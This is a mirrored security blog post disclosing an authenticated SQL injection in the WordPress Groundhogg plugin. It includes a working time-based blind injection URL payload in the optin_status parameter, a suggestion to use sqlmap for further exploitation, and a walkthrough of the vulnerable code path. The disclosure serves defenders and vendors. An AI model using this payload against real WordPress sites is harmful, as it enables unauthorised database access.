4

Wordpress Groundhogg <= 1.3.11.13 Authentificated SQL Injection

 2 years ago
source link: https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-sql-injection-vulnerability/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Wordpress Groundhogg <= 1.3.11.13 Authentificated SQL Injection

Oct 23, 2019 • my_exploits, offensive_security

Wordpress Groundhogg <= 1.3.11.13 Authentificated SQL Injection

Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.

Intial submission of the vulnerability

# Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

Detailed analysis of the vulnerability

The function from /wp-content/plugins/groundhogg/includes/admin/tools/class-wpgh-export-bulk-job.php from lines 38-51 is accepting arbitrary user-supplied data as follows:

public function query($items)
{
    if ( ! current_user_can( 'export_contacts' ) ){
        return $items;
    }

    $query = new WPGH_Contact_Query();
    $args = $_GET;

    $contacts = $query->query( $args );
    $ids = wp_list_pluck( $contacts, 'ID' );

    return $ids;
}

The line containing $contacts = $query->query( $args ); allows unsanitised user input within the following function from /wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php lines 279-284:

public function query( $query ) {
    $this->query_vars = wp_parse_args( $query );
    $items = $this->get_items();

    return $items;
}

Finaly the unsinitised query is perfomed on wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php at line 430 ( WPGH_Contact_Query->query_items() ):

$results       = $wpdb->get_results( $this->request );

return $results;

How to fix

Update to the latest available version of the Groundhogg plugin.

Public appearances

Other references

Comments


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK